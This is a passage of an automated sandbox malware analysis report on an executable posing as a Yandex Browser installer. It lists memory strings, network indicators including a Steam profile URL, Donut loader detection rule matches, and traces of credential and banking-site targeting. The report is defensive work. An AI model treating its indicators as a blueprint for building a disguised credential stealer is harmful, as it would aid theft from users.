          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1633024645.0000000005A79000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A4D000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1633024645.0000000005A79000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A4D000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1633024645.0000000005A79000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A4D000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
          Source: 76561199619938930[1].htm.1.drString found in binary or memory: https://steamcommunity.com/
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drString found in binary or memory: https://steamcommunity.com/discussions/
          Source: 0x001900000002ab40-59.exe, 00000001.00000002.1724281527.0000000005A38000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A4D000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1647321556.0000000005A4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/hg
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
          Source: 76561199619938930[1].htm.1.drString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199619938930
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drString found in binary or memory: https://steamcommunity.com/market/
          Source: unknown HTTPS traffic detected: 104.102.42.29:443 -> 192.168.2.10:49708 version: TLS 1.2
          Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:49709 version: TLS 1.2

          System Summary

          Source: 1.2.0x001900000002ab40-59.exe.5942544.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
          Source: 1.2.0x001900000002ab40-59.exe.5942544.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
          Source: 00000001.00000002.1724191152.0000000005940000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exe Code function: 1_2_059A0A87 NtCreateSection, NtMapViewOfSection, VirtualAlloc, NtMapViewOfSection, VirtualProtect, VirtualProtect, VirtualProtect
          Source: 0x001900000002ab40-59.exe Static PE information: invalid certificate
          Source: 0x001900000002ab40-59.exe Static PE information: Resource name: BIN type: Microsoft Cabinet archive data, 2408 bytes, 1 file, at 0x2c +A "brand_config", number 1, 1 datablock, 0x1 compression
          Source: 0x001900000002ab40-59.exe Binary or memory string: OriginalFilename vs 0x001900000002ab40-59.exe
          Source: 0x001900000002ab40-59.exe, 00000001.00000000.1519545162.0000000000933000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: file_version_info_win.ccCreateFileVersionInfoWinCompanyNameCompanyShortNameInternalNameProductNameProductShortNameProductVersionProductChromiumVersionProductYandexVersionFileDescriptionFileVersionOriginalFilenameSpecialBuild\StringFileInfo\%04x%04x\%ls\VarFileInfo\Translation\GetHandleVerifierGenuineIntel vs 0x001900000002ab40-59.exe
          Source: 0x001900000002ab40-59.exe, 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: file_version_info_win.ccCreateFileVersionInfoWinCompanyNameCompanyShortNameInternalNameProductNameProductShortNameProductVersionProductChromiumVersionProductYandexVersionFileDescriptionFileVersionOriginalFilenameSpecialBuild\StringFileInfo\%04x%04x\%ls\VarFileInfo\Translation\GetHandleVerifierGenuineIntel vs 0x001900000002ab40-59.exe
          Source: 0x001900000002ab40-59.exe Binary or memory string: |Jfile_version_info_win.ccCreateFileVersionInfoWinCompanyNameCompanyShortNameInternalNameProductNameProductShortNameProductVersionProductChromiumVersionProductYandexVersionFileDescriptionFileVersionOriginalFilenameSpecialBuild\StringFileInfo\%04x%04x\%ls\VarFileInfo\Translation\GetHandleVerifierGenuineIntel vs 0x001900000002ab40-59.exe
          Source: 0x001900000002ab40-59.exe Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
          Source: 1.2.0x001900000002ab40-59.exe.5942544.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
          Source: 1.2.0x001900000002ab40-59.exe.5942544.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
          Source: 00000001.00000002.1724191152.0000000005940000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
          Source: classification engine Classification label: mal88.troj.spyw.winEXE@1/2@2/2
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exe Code function: 1_2_0086C530 GetLastError, GetModuleHandleW, FormatMessageA, _strlen, _strlen, GetLastError, _strlen
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_008BA790 _strlen,_strlen,_strlen,_strlen,GetDiskFreeSpaceExW,1_2_008BA790
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_008A09A0 CreateToolhelp32Snapshot,1_2_008A09A0
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_00858230 GetModuleHandleW,FindResourceW,LoadResource,LockResource,SizeofResource,1_2_00858230
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\76561199619938930[1].htm
          Source: 0x001900000002ab40-59.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1691320920.0000000008320000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1670130730.000000000830C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
          Source: 0x001900000002ab40-59.exeVirustotal: Detection: 19%
          Source: 0x001900000002ab40-59.exeString found in binary or memory: https://download.cdn.yandex.net/browser/installer/
          Source: 0x001900000002ab40-59.exeString found in binary or memory: /installstats/send/dtype=stred/pid=457
          Source: 0x001900000002ab40-59.exeString found in binary or memory: show-uac-at-browser-start
          Source: 0x001900000002ab40-59.exeString found in binary or memory: install-start-time-no-uac
          Source: 0x001900000002ab40-59.exeString found in binary or memory: program-files-installation
          Source: 0x001900000002ab40-59.exeString found in binary or memory: do-not-launch-browser
          Source: 0x001900000002ab40-59.exeString found in binary or memory: parent-installer-process-id
          Source: 0x001900000002ab40-59.exeString found in binary or memory: https://download.cdn.yandex.net/browser/installer/alice/scenarios/
          Source: 0x001900000002ab40-59.exeString found in binary or memory: https://storage.ape.yandex.net/get/browser/install
          Source: 0x001900000002ab40-59.exeString found in binary or memory: /support/browser/about/install.xml
          Source: 0x001900000002ab40-59.exeString found in binary or memory: TBrandFilePartnerFilebrandlangGetInfoBrand package path: Partner package path: GetInfoFromResourcesExtract Partner package: [B]partner_configPartner package is empty.Fetching autodetected packageBRAND_Fetching definedFetching default packageExtract Brand package: brand_configBrand package is empty.https://download.cdn.yandex.net/browser/installer/alice/scenarios//browser-setup.archttps://download.cdn.yandex.net/browser/https://api.browser.yandex.net/content/get/experiments/browser.protohttps://api.browser.yandex.ru/ab/gethttps://webntp.yandex.ruClearReset brand info.ApplyBrandInfoFailed to load json : Incorrect format of jsonlanguages.interfaceinstall.setup_urlinstall.setup_url_versioninstall.setup_url64install.setup_url_version64install.setup_url32install.setup_url_win7install.alternate_installer_titleinstall.send_statisticsinstall.make_browser_defaultinstall.scenarios_urlinstall.slide_urlinstall.slide_url_if_taggedurls.variationsurls.abturls.webntpinstall.preloaded_wallpapers_urlinstall.pinFound install.pininstall.yapin_trial_stateoverridden_features.InstallerNewIdentity2024overridden_features.InstallerNewIdentity2024.params.firstScreenOffoverridden_features.InstallerNewIdentity2024.params.dialogsRedesignInstallerNewIdentity2024: firstScreenOff = , dialogsRedesign = overridden_features.InstallerDarkTheme2024overridden_features.InstallerDarkTheme2024.enabledInstallerDarkTheme2024: enabled = ..\..\third_party\libc++\src\include\__string\char_traits.h:322: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap
          Source: 0x001900000002ab40-59.exeString found in binary or memory: GetModuleCreationTimeFile version resource is absent in Version time is 0 in Used the last write file timeDownloadAttempt to download module: baneridyandexuiddistr_yandexuid0c0f0f0d-6434-4cfd-a5e9-23e9ca4d94b6fef32d6d-67e9-4654-b314-6c72098ff5d1ExtractInstallerDataIfAbsentFailed to extract resource InstallerDataClidsFileYandexWebsiteIconFileAbtConfigResourceFileunknown~InstallerFailed to wait for install async exit. Terminate install_thread_RunModuleAndWaitRun: Create process failed.Process created: Wait for process finish.Wait process failed.Get setup process exit code failed.Setup process exit with code: downloadactionerrorstage-attempt-errorurlredirectdownload_attemptsuccessstatusfailedattempt_numberdownloaded_sizetotal_sizex64https://storage.ape.yandex.net/get/browser/install?ui=&result=cancelled&time=&download_time=&install_time=ReportInstallationFinishedCannot report installation status: DownloadOrExtractModuleCannot create file:Try to download module:IsVersionedSetupUrlAllowedWrong setup url:https://download.cdn.yandex.net/browser-partners/_xp_builds/browser-setup.arcGetDownloadUrlsFromBrandConfigSetup url x64 empty!Setup url x32 empty!DownloadModuleSetup url is empty.Selected download urls:Installation stoppedMax download attempts failedInstallWrong overridden partner package path:Partner package override is:Partner package override found: GetModulePathCannot obtain temp file.GetModuleModule was not downloaded: Module downloaded: normalRunModuleInElevatedProcessStarted waiting the elevated installer has finished its work.The elevated installer has finished, success=InstallBrowserInstall Browser.setup_arc_permanent_lockExecutable path: Installation after download event isn't in signal state or installation was stopped early.Cannot lock file: Module verification failed: Verification succeeded: Unexpected error in CreateDelayedParamsMapping()ExtractBrowserSetupResourceWrite failed. 
Roll back write operation.clicked_buttonclicked_linkchosen_checkboxliteinstalldialog_windowinstall_browser_button_clicked10checkbox_defaultcheckbox_sendstatinstaller_starteddpiresolutionstartedfinisheddownload_timesetup_arc_lockverificationsetupupdatesetup_exe_launched100uacsetup_exe_exitedFailedToStartsetup_timeWriteDelayedParamsToo large string length, browser_arc_path= clids_file_path= yandex_website_icon_file_path= installer_data_path= brand_package_path= partner_package_path= partner_package_override_path= histogram_download_time= histogram_full_time= send_statistics= make_default= install_yapin=EnsureProcessFinishedThe elevated installer hangs and must be forcibly terminated.RunModuleThe elevated installer was terminated due to stop event.Failed to get exit code of the elevated installer.NeedStartThisProcessAsAdminUser is not in admin group.Windows version is not suitable for elevated restart.Found non install-switch:Run-as-admin functionality is already enabled.Elevated run is necessary but silent instalation is requested - UAC will not be shown.fake_browse
          Source: 0x001900000002ab40-59.exeString found in binary or memory: ua-ukua-rucom.trintcom/support/browser/about/install.xmlhttps://yandex.Arial(
          Source: 0x001900000002ab40-59.exeString found in binary or memory: BINmsi-databasepartner-package-guid/GetYapinTrialStateNo install.pin for yapin_state=yapinruuktrdeesfritjapt-PTpt-BRzh-CNzh-TWkkuzcsenhttps://download.cdn.yandex.net/browser/installer/ybLocal\YandexBrowserLiteInstallerMutex-E523E369-4A72-4B13-AD57-5B956174172A/download&code=user32.dllChangeWindowMessageFilterExChangeWindowMessageFilterdefstatstatpromotruefirstdarkthemeSoftware\Microsoft\Windows\CurrentVersion\Themes\PersonalizeAppsUseLightThemeuts2uacBringProcessWindowToTopFailed to bring process window to top: wrong process idExtractPartnerPackageOverridePackageReading msi Failed to open msi file for reading, error= file_attrs=Failed to get source file size for extracted package validation.Failed to move file pointer for guid reading.Failed to read tailing guid markerTail GUID from msi does not match specified guid marker: guid_marker= tailing_guid=Failed to move file pointer for target position reading.Failed to move file pointer to target pos for package reading.Failed to read starting guid markerAppendix start GUID from msi does not match specified guid marker: Failed to read zip sizeFailed to read zip dataFailed to read signature sizeFailed to read signature dataZip verification failed: Failed to open target file for reading Failed to write file data to output file Unable to delete file: testids,CombineBrandAndDistribTestIdsDuplicate testid found: ..\..\third_party\libc++\src\include\string:1221: assertion __pos <= size() failed: string index out of bounds
          Source: 0x001900000002ab40-59.exeString found in binary or memory: brand-namebrand-packageclids-fileyandex-website-icon-fileabt-config-resource-filedisable-error-dialog-download-buttondistr-info-filedistr-info-paramsdistribution-channelhistogram-download-timemake-browser-default-after-importok-button-pressed-timethe-interface-availabilityinstall-start-time-no-uacpartner-packageprogram-files-installationprogress-windowsimulate-crashdo-not-launch-browserfake-rename-yandex-internetshow-uac-at-browser-startsend-statisticssilentsemi-silentuac-enabledset-as-default-browserset-as-default-browser-dllsetup-cmd-linedisable-uacparent-installer-process-idoverride-partner-packagecheck-the-interfacepttw1pwattw1pttw0disableyapinyapin-statevariations-update-pathabt-update-pathserver-config-bundle-pathpreloaded-wallpaper-bundle-pathwebntp-pathdownload-x32download-x64use-task-scheduler2browser-presentinstaller-brand-idinstaller-partner-idtestidsold_verinstaller_typeinstall_statlite_install_failedKNOWN_ERROR_msi_read_errorKNOWN_ERROR_untrusted_certificateidentity,browser
          Source: 0x001900000002ab40-59.exeString found in binary or memory: https://api.browser.yandex.ru/installstats/send/dtype=stred/pid=457/cid=/path=/vars=extended_statyabrowser_reinstall_dialogyabrowser_pf_migrationzombo_window
          Source: 0x001900000002ab40-59.exeString found in binary or memory: Browser-InstallationGDer Yandex-Browser konnte auf diesem Computer nicht installiert werden.0SSE2 wird von Ihrem Prozessor nicht unterst
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exe Section loaded: oleacc.dll
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exe Section loaded: wininet.dll
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exe Section loaded: mscoree.dll
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exe Section loaded: rstrtmgr.dll
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exe Section loaded: ncrypt.dll
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exe Section loaded: ntasn1.dll
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exe Section loaded: iertutil.dll
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exe Section loaded: sspicli.dll
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exe Section loaded: windows.storage.dll
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exe Section loaded: wldp.dll
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exe Section loaded: profapi.dll
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exe Section loaded: kernel.appcore.dll
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exe Section loaded: ondemandconnroutehelper.dll
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exe Section loaded: winhttp.dll
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exe Section loaded: mswsock.dll
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exe Section loaded: iphlpapi.dll
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exe Section loaded: winnsi.dll
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exe Section loaded: urlmon.dll
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exe Section loaded: srvcli.dll
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exe Section loaded: netutils.dll
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exe Section loaded: dnsapi.dll
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exe Section loaded: rasadhlp.dll
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exe Section loaded: fwpuclnt.dll
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exe Section loaded: schannel.dll
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exe Section loaded: mskeyprotect.dll
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exe Section loaded: msasn1.dll
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exe Section loaded: dpapi.dll
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exe Section loaded: cryptsp.dll
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exe Section loaded: rsaenh.dll
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exe Section loaded: cryptbase.dll
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exe Section loaded: gpapi.dll
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exe Section loaded: ncryptsslp.dll
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exe Section loaded: uxtheme.dll
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exe Section loaded: dxgi.dll
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exe Section loaded: resourcepolicyclient.dll
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
          Source: 0x001900000002ab40-59.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
          Source: 0x001900000002ab40-59.exeStatic file information: File size 10445744 > 1048576
          Source: 0x001900000002ab40-59.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x111800
          Source: 0x001900000002ab40-59.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x83f600
          Source: 0x001900000002ab40-59.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
          Source: 0x001900000002ab40-59.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
          Source: 0x001900000002ab40-59.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
          Source: 0x001900000002ab40-59.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: 0x001900000002ab40-59.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
          Source: 0x001900000002ab40-59.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
          Source: 0x001900000002ab40-59.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
          Source: Binary string: C:\BuildAgent\work\6a6d135591f2f49f\src\out\Default\win_clang_x86\lite_installer.exe.pdb source: 0x001900000002ab40-59.exe
          Source: 0x001900000002ab40-59.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
          Source: 0x001900000002ab40-59.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
          Source: 0x001900000002ab40-59.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
          Source: 0x001900000002ab40-59.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
          Source: 0x001900000002ab40-59.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_008F87E0 LoadLibraryW,GetProcAddress,TryAcquireSRWLockExclusive,ReleaseSRWLockExclusive,1_2_008F87E0
          Source: 0x001900000002ab40-59.exeStatic PE information: section name: SHARED
          Source: 0x001900000002ab40-59.exeStatic PE information: section name: Shared
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_00900F8B push ecx; ret 1_2_00900F9E
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_05981579 push ecx; ret 1_2_0598158C
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_0086F990 rdtsc 1_2_0086F990
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeAPI coverage: 2.9 %
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_009232F1 FindFirstFileExW,1_2_009232F1
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_009233A5 FindFirstFileExW,FindNextFileW,FindClose,FindClose,1_2_009233A5
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_008CD950 FindFirstFileExW,GetLastError,GetFileAttributesW,FindNextFileW,FindClose,1_2_008CD950
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_0089F490 GetLogicalDriveStringsW,QueryDosDeviceW,1_2_0089F490
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_009007FF VirtualQuery,GetSystemInfo,1_2_009007FF
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1690685217.0000000008345000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1690685217.0000000008345000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696501413o
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1690685217.0000000008345000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696501413h
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1690685217.0000000008345000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696501413
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1690685217.0000000008345000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1690685217.0000000008345000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696501413j
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1690685217.0000000008345000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive userers - COM.HKVMware20,11696501413
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A64000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000002.1724281527.00000000059FC000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000002.1724281527.0000000005A64000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1647321556.0000000005A64000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1690685217.0000000008345000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696501413
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1690685217.0000000008345000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696501413|UE
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1690685217.0000000008345000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696501413x
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1690685217.0000000008345000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696501413}
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1690685217.0000000008345000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1690685217.0000000008345000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696501413x
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1690685217.0000000008345000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696501413t
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1690685217.0000000008345000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive userers - HKVMware20,11696501413]
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1690685217.0000000008345000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696501413s
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1690685217.0000000008345000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1691414851.00000000082C6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696501413p
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1690685217.0000000008345000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696501413u
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1690685217.0000000008345000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1690685217.0000000008345000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive userers - EU WestVMware20,11696501413n
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1690685217.0000000008345000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696501413
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1690685217.0000000008345000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1690685217.0000000008345000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactiveuserers.comVMware20,11696501413}
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1690685217.0000000008345000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: interactiveuserers.co.inVMware20,11696501413d
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1690685217.0000000008345000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696501413x
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1690685217.0000000008345000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696501413
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1690685217.0000000008345000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696501413t
